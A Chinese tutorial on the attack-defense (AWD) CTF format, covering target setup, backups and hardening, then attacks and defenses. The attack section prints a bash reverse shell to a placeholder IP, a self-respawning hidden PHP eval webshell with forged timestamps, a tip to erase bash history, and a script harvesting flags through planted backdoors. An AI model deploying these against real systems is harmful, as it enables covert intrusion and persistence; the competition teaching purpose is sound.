我的编程空间,编程开发者的网络收藏夹
学习永远不晚

CTF AWD入门实例分析

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

CTF AWD入门实例分析

这篇文章主要介绍了CTF AWD入门实例分析的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF AWD入门实例分析文章都会有所收获,下面我们一起来看看吧。

    引文

    AWD赛制是一种网络安全竞赛的赛制。AWD赛制由安全竞赛专家及行业专家凭借十多年实战经验,将真实网络安全防护设备设施加入抽象的网络环境中,模拟、企业、院校等单位的典型网络结构和配置,开展的一种人人对抗的竞赛方式,考验参赛者攻防兼备的能力。

    其主要特点为:强调实战性、实时性、对抗性,综合考量竞赛队的渗透能力和防护能力。

    站点部署

    比赛开始时我们会分配到一个至多个靶机,通常是分配给我们ssh 用户名和密码还有虚拟ip等信息,我们需要自己去连接靶机。个人推荐使用xshell搭配xftp来使用,当我们连接靶机之后要做什么呢。

    CTF AWD入门实例分析

    dump源码

    比赛开始第一件事,dump网站源码,使用ssh工具保留源码,复制两份,用d盾去扫一份,因为当我们靶机受到攻击时对手可能直接删除我们的源码导致靶机DOWN机,而通常比赛中主办方会在源码中留有一些后门,我们用D盾去扫描一下来进行修复攻击

    数据库备份

    我们登录数据库来进行备份,当数据被删除时可以使用命令快速还原。

    mysqldump -u db_user -p db_passwd db_name > 1.sql //备份指定数据库

    还原命令:

    mysql -u db_user -p db_passwd db_name < 1.sql //还原指定数据库

    修改密码

    当主办方给我们的连接密码过于简单时,不排除对手先登录我们靶机来进行破坏,于是我们要快速修改弱口令密码。

    linux修改ssh即本地密码:

    passwd

    修改mysql登录密码:

    mysql>set password for root@localhost =password('xino');

    关闭不必要端口

    一些端口会存在漏洞,为了保证安全我们关闭一些不必要的端口来进行维护:

    CTF AWD入门实例分析

    部署WAF

    WAF是用来分析阻挡对手攻击的工具它可以分析流量,别人攻击我们的时候,我们可以看到别人的攻击方式。当没有攻击思路时我们就可以分析流量,使用别人的攻击方式。 部署方式如下:

    每个文件前边加:

    require_once(waf.php);

    为了方便我们可以修改php.ini配置文件,来自动给当前文件夹下文件头部添加:

    auto_prepend_file=<filename>;

    攻击(ATTACK)

    当我们部署完自己的靶机确认没有漏洞后,我们便可以尝试攻击别人机器了。

    弱口令

    当发现靶机存在弱口令后,我们就可以遍历IP地址来查询存活的机器来自动连接查找FLAG,或者在受害者靶机里植入后门文件来维持我们的控制。

    自带后门

    通常靶机会有自带的后门木马,我们知道路径后便可以写一个脚本批量连接来提交FLAG。

    nmap

    扫描C段存活主机:

     .\nmap xxx.xxx.xxx.xxx/24

    保存为TXT文件以便于之后编写脚本去攻击。

    CTF AWD入门实例分析

    WEB攻击

    举几个比较常见的WEB攻击方式:

    文件读取,伪协议方式读取flag

    文件上传,绕过黑白名单上传一句话,用工具连接查找flag

    命令执行,通过system等函数来遍历文件

    SQL注入,寻找注入点注出flag

    当我们找到上面漏洞后,尽量去写一个脚本来自动提交flag,之后再去寻找其他漏洞。

    写入木马

    因为AWD赛制是回合制,所以我们要想保持长时间稳定上分就要时刻控制别人靶机,也就是要传入木马但又不能被对手发现,下面列举几个权限维持的小技巧。

    bash反弹shell

    利用预留后门上传上面的php文件并访问,就可以用nc反弹shell,nc反弹shell命令如下:

    bash -i >& /dev/tcp/xx.xxx.xxx.xxx/9 0>&1nc -l -p 8080

    CTF AWD入门实例分析

    注意: 使用bash命令,会在root目录生成名为~/.bash_history的记录文件,我们要清除来消除威胁。

    不死马

    一个简单的不死马:

    <?php    ignore_user_abort(true);    set_time_limit(0);    unlink(__FILE__);    $file = '.config.php';    $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';    //pass=pass    while (1){        file_put_contents($file,$code);        system('touch -m -d "2020-10-21 04:17:18" .config.php');        usleep(5000);    }?>

    不死马的作用就是将该php文件上传到服务器,然后进行访问,会在该路径下循环生成名字为.config.php的不死马隐藏文件。以此来达到权限维持。

    提交脚本

    比赛中可能会有几十台靶机,尽管我们知道了如何攻击,但一个一个打似乎有一些太慢了,所以这时我们要利用脚本去批量提交解放双手。这里就在网上找了几个常用的:

    预留后门利用脚本:

    import requestsurl_head="http://xxx.xx.xxx."    #网段url=""shell_addr="/Upload/index.php"passwd="xxxxx"                    #木马密码port="80"payload =  {passwd: 'system('cat /flag');'}webshelllist=open("webshelllist.txt","w")flag=open("firstround_flag.txt","w")for i in range(30,61):    url=url_head+str(i)+":"+port+shell_addr    try:        res=requests.post(url,payload,timeout=1)        if res.status_code == requests.codes.ok:            result = url+" connect shell sucess,flag is "+res.text            print result            print >>flag,result            print >>webshelllist,url+","+passwd        else:            print "shell 404"    except:        print url+" connect shell fail"webshelllist.close()flag.close()

    批量提交flag脚本(需根据要求自行修改):

    import sysimport jsonimport urllibimport httplibserver_host = ' '    #提交flag的服务器地址server_port = 80def submit(team_token, flag, host=server_host, port=server_port, timeout=5):    if not team_token or not flag:        raise Exception('team token or flag wrong')    conn = httplib.HTTPConnection(host, port, timeout=timeout)    params = urllib.urlencode({        #提交需要post的参数,根据情况修改        'token': team_token,            'flag': flag,    })    headers = {        "Content-type": "application/x-www-form-urlencode"    }    conn.request('POST', '[submit_flag_dir]', params, headers)    #第二个参数为提交flag的目录    response = conn.getresponse()    data = response.read()    return json.loads(data)if __name__ == '__main__':    if len(sys.argv) < 3:        print 'usage: ./submitflag.py [team_token] [flag]'        sys.exit()    host = server_host    if len(sys.argv) > 3:        host = sys.argv[3]    print json.dumps(submit(sys.argv[1], sys.argv[2], host=host), indent=4)

    防御(DEFENSE)

    既然有攻击那么也需要防御别人的攻击,上面其实已经讲了一些防御的技巧了,比如修改弱口令,上传WAF等,这里就简单总结一下其他常用的知识吧。

    查找flag的位置

    find / -name *flag*

    查找password

    find .|xargs grep "password"

    查看以建立的连接和进程

    netstat -antulp | grep EST

    结束进程

    kill PIDkillall <进程名>  

    检测TCP连接数量

    netstat -ant|awk  |grep |sed -e  -e |sort|uniq -c|sort -rn

    chattr命令防止系统中某个关键文件被修改

    chattr +i /etc/resolv.conf

    流量监控

    当别人访问我们靶机时请求的URL可能就是攻击的payload,我们如果知道他们的请求就可以利用他们的手段来反打过去,这个基于流量监控来实现,一个简单的脚本如下:

    <?phpdate_default_timezone_set('Asia/Shanghai');$ip = $_SERVER["REMOTE_ADDR"]; //记录访问者的ip$filename = $_SERVER['PHP_SELF']; //访问者要访问的文件名$parameter = $_SERVER["QUERY_STRING"]; //访问者要请求的参数$time = date('Y-m-d H:i:s',time()); //访问时间$logadd = '来访时间:'.$time.'-->'.'访问链接:'.'http://'.$ip.$filename.'?'.$parameter."\r\n";// log记录$fh = fopen("log.txt", "a");fwrite($fh, $logadd);fclose($fh);?>

    关于“CTF AWD入门实例分析”这篇文章的内容就介绍到这里,感谢各位的阅读!相信大家对“CTF AWD入门实例分析”知识都有一定的了解,大家如果还想学习更多知识,欢迎关注编程网行业资讯频道。

    免责声明:

    ① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

    ② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

    CTF AWD入门实例分析

    下载Word文档到电脑,方便收藏和打印~

    下载Word文档

    猜你喜欢

    CTF AWD入门实例分析

    这篇文章主要介绍了CTF AWD入门实例分析的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF AWD入门实例分析文章都会有所收获,下面我们一起来看看吧。引文AWD赛制是一种网络安全竞赛的赛制。AWD赛制由安
    2023-07-04

    Elasticsearch入门实例分析

    这篇文章主要介绍“Elasticsearch入门实例分析”,在日常操作中,相信很多人在Elasticsearch入门实例分析问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”Elasticsearch入门实例分析
    2023-06-05

    JUnit5基础入门实例分析

    这篇“JUnit5基础入门实例分析”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面我们一起来看看这篇“JUnit5基础入门实例分析”文章吧。设计哲
    2023-06-17

    Rollup入门实例代码分析

    这篇文章主要介绍了Rollup入门实例代码分析的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇Rollup入门实例代码分析文章都会有所收获,下面我们一起来看看吧。Rollup介绍及使用1、Rollup 概述仅仅是
    2023-07-05

    Vue新手入门实例分析

    本篇内容介绍了“Vue新手入门实例分析”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!1. Vue实例和模板语法
    2023-06-27

    Java入门数组实例分析

    今天小编给大家分享一下Java入门数组实例分析的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。认识数组数组的定义数组是相同类型
    2023-06-30

    drools入门案例分析

    今天小编给大家分享一下drools入门案例分析的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。一、背景最近在学习规则引擎dro
    2023-06-30

    CTF中的PHP特性函数实例分析

    这篇文章主要介绍“CTF中的PHP特性函数实例分析”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“CTF中的PHP特性函数实例分析”文章能帮助大家解决问题。MD5强弱碰撞对于MD5加密大家一定很熟悉,
    2023-07-05

    js类库styled-components入门实例分析

    这篇文章主要介绍“js类库styled-components入门实例分析”,在日常操作中,相信很多人在js类库styled-components入门实例分析问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”js类
    2023-07-02

    Python面向对象入门实例分析

    这篇文章主要介绍“Python面向对象入门实例分析”,在日常操作中,相信很多人在Python面向对象入门实例分析问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”Python面向对象入门实例分析”的疑惑有所帮助!
    2023-06-27

    VBS入门脚本语言实例分析

    这篇文章主要介绍“VBS入门脚本语言实例分析”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“VBS入门脚本语言实例分析”文章能帮助大家解决问题。一、VBS简介VBS是一种Windows脚本语言,全称是
    2023-06-30

    C语言数组入门实例分析

    本篇内容主要讲解“C语言数组入门实例分析”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“C语言数组入门实例分析”吧!1.一维数组数组的定义: 数组是一组相同类型元素的集合a.一维数组的创建数组的创
    2023-06-30

    编程热搜

    • Python 学习之路 - Python
      一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
      Python 学习之路 - Python
    • chatgpt的中文全称是什么
      chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
      chatgpt的中文全称是什么
    • C/C++中extern函数使用详解
    • C/C++可变参数的使用
      可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
      C/C++可变参数的使用
    • css样式文件该放在哪里
    • php中数组下标必须是连续的吗
    • Python 3 教程
      Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
      Python 3 教程
    • Python pip包管理
      一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
      Python pip包管理
    • ubuntu如何重新编译内核
    • 改善Java代码之慎用java动态编译

    目录